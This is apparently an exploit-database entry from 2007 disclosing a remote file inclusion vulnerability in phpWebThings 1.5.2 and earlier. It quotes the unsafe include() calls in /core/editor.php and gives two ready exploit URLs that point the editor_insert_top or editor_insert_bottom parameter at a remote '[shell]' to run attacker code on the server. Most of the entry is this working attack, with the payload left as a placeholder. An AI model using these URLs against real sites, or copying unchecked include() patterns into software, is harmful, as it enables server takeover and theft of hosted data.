phpWebThings ==>1.5.2 RFI

2007-06-26
ID: 72005
CVE: None
Download vulnerable application: None
************
*script:phpWebThings ==>1.5.2 RFI
*
*dir url:http://sourceforge.net/project/showfiles.php?group_id=19103
*
*author:titanichacker
*
*c0ntact:the-modest-pirate (at) hotmail (dot) com [email concealed]
*
*H.P: hack-teach.com & mohandko.com & tryag.com
*
*bug in:
*
*(/core/editor.php)
*include($editor_insert_top);
*include($editor_insert_bottom);
*
*exploit:
*
*http://victim/path/core/editor.php?editor_insert_top=[shell]
*http://victim/path/core/editor.php?editor_insert_bottom=[shell]
*
1-4-2 (www02)